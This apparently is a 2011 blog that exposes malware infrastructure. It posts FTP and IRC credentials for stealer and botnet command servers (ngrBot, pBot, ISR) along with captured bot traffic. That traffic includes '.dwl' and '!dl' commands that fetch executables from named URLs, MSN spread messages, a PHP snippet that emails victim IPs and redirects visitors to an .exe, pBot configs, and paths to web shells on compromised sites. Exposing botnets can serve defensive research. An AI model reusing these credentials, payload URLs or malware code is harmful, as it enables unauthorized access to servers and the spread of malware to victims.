Pages

Wednesday, November 30, 2011

Stealer - FTP - 199.238.129.124 

IP : 199.238.129.124:21
USER : volun7
pass : amigo+10
// Shell 
hxxp://199.238.129.124/xxx.php
Posted by at No comments:
Labels: ,

Monday, November 28, 2011

Owned - ngrBot - idhrix30 (HF) 

63.223.79.122:5794 PASS ngrBot
NICK n{US|XPa}owsekei
USER owsekei 0 0 :owsekei
JOIN #chan ngrBot
JOIN #chanspread
PRIVMSG #chan :[DNS]: Blocked 0 domain(s) - Redirected 13 domain(s)


$ip = getenv("REMOTE_ADDR");
$content = "
-----------------------------------------------------
INFECTADO SPREAD rlzz ng . =)

Fecha: $Fecha / Hora: $Hora
Ip Host Victima: $ip
----------
xD
----------------------------------------------------- \n";

$correo1 = "idhrix30@gmail.com";
$subject = "INFECTADO SPREAD rlzz ng - $ip";
$from = "From:INFETADO SPREAD rlzz ng ";

 mail($correo1,$subject,$content,$from);
?>
html>head>
meta http-equiv="refresh" content="0; URL=IMG80593858.exe">
/head>
Posted by at No comments:
Labels: ,

Stealer - ISR v0.3 - keskustelua.com 

// not many logs but .. :P
http://www.keskustelua.com/index.php
user : admin
pass : admin
Posted by at No comments:
Labels: ,

Tuesday, November 22, 2011

PHP - pBot - Gerbong3

Posted by at No comments:
Labels: ,

Monday, November 21, 2011

Working on 

// 100 bots inside and many scanners
class pBot
var $config = array("server"=>"irc.javairc.org",
                    "port"=>"6667",
                    "pass"=>"",
                    "prefix"=>"tiga",
                    "maxrand"=>"5",
                    "chan"=>"# owner",
                    "chan2"=>"# owner",
                    "key"=>"bot",
                    "modes"=>"+ps",
                    "password"=>"jancuk",
                    "trigger"=>".",
                    "hostauth"=>"stupid.us"
Posted by at No comments:

PHP - pBot - e107.fuck.cc




Posted by at No comments:
Labels: ,

Sunday, November 20, 2011

Linux - ngrBot - 212.7.203.231 

IP : 212.7.203.231
Port : 1866
Pass : secret
///// traffic on IRC
PRIVMSG x :[v="1.1.0.0" c="30e41aa1" h="256637BCBF0DEAC06623689DB831A54F" p="C:\Documents and Settings\UserName\Application Data\Scxaxs.exe"]
NICK n{US|XPa}ufzpzpe
USER ufzpzpe 0 0 :ufzpzpe
JOIN #!x! secret
PRIVMSG #!x! :[MSN]: Updated MSN spread interval to "2"
PRIVMSG #!x! :[MSN]: Updated MSN spread message to ":) hahahayhahahua! http://littlewillow.com/Facebook-pic-182626-JPEG"
PRIVMSG #!x! :[HTTP]: Updated HTTP spread interval to "3"
PRIVMSG #!x! :[HTTP]: Updated HTTP spread message to ";) hehehe! http://littlewillow.com/Facebook-pic-379596-JPEG"


//and easy found a shell whith simple crwaling
http://littlewillow.com/wp-content/uploads/2007/07/ibinc.php
Posted by at No comments:
Labels:

Wednesday, November 16, 2011

Owned - ngrBot - bt1.oyoba.com 





Resolved : [bt1.oyoba.com] To [87.251.154.185]
Resolved : [bt1.oyoba.com] To [87.251.154.168]
Resolved : [bt1.oyoba.com] To [87.251.154.135]
Resolved : [bt1.oyoba.com] To [87.251.154.145]

87.251.154.145:7654 Server Pass: ngrBot
87.251.154.135:7654 Server Pass: ngrBot
87.251.154.168:7654 Server Pass: ngrBot
87.251.154.185:7654 Server Pass: ngrBot
//////// BOT ////////////
Nick: n{US|XPa}bjhvcdc
Username: bjhvcdc
Server Pass: ngrBot
Joined Channel: #oldgold with Password noKIDs
Joined Channel: #US
Channel Topic for Channel #oldgold: "~pais ~updt http://myratingis.com/images/fu83.exe 601a0ac00b568b89adb801a1b38dd169"
Private Message to Channel #oldgold: "[d="http://myratingis.com/images/fu83.exe" s="401 bytes"] Update error: MD5 mismatch (629AC4710AC6DFD51A7377877CB49D04 != 601a0ac00b568b89adb801a1b38dd169)"










Posted by



at





No comments:
  

















Labels:
,
















          

        

          

        

Monday, November 14, 2011


          

        










FTP - Stealer - 173.249.146.30 (JP)
















//FTP -
173.249.146.30:21
USER hoge@premium-072.com
PASS 0123




// trafic on ftp 
| PORT 192,168,88,
| 128,4,31..SIZE s
| etting.ini..RETR
|  setting.ini..PA
| SS 0123..TYPE I.
| .PORT 192,168,88
| ,128,4,28..SIZE
| setting.ini..RET
| R setting.ini..P
| ASS 0123..TYPE I
| ..










Posted by



at





No comments:
  

















Labels:
,
















          

        

          

        

Saturday, November 12, 2011


          

        










OWNED - rtrforums.com
































Thanks to exposedbotnets









Posted by



at





No comments:
  

















Labels:

























FTP - Stealer - liweinternet.info


















// FTP Stealer - liweinternet.info
31.214.145.148:21
user : google
pass : kb0EusIN



818857867980.psw
773817033114.psw










Posted by



at





No comments:
  

















Labels:
,
















          

        

          

        

Tuesday, November 8, 2011


          

        










OWNED - ngrBot - tc.byinter.net


































tc.byinter.net
46.29.248.104
NICK n{KCA}XP|USA|594839
USER 5948 "" "TsGh" :5948
:n{KCA}XP|USA|594839 MODE n{KCA}XP|USA|594839 :+iwxG
JOIN #KCA2 KCA
#KCA2 :.dwl http://www.websells.com/ngrs.exe
#KCA2 CaCa 1320706998
----
 [8:48]  (KCA) !stop
 [8:53]  (KCA) !login KCA
 [8:53]  (KCA) !dl http://www.websells.com/ayran.exe











Posted by



at





No comments:
  

















Labels:
















          

        

          

        

Wednesday, November 2, 2011


          

        










PHP - pBot - 174.127.115.9


















http://phareon.net/gringo.txt
 var $config = array("server"=>"174.127.115.9",
                     "port"=>"2525",
                     "pass"=>"",
                     "prefix"=>"RR|",
                     "maxrand"=>"8",
                     "chan"=>"#RR",
                     "chan2"=>"",
                     "key"=>"",
                     "modes"=>"+p",
                     "password"=>"pass",
                     "trigger"=>".",
                     "hostauth"=>"*" // * 

















Posted by



at





No comments:
  

















Labels:
















        

      









Subscribe to:
Comments (Atom)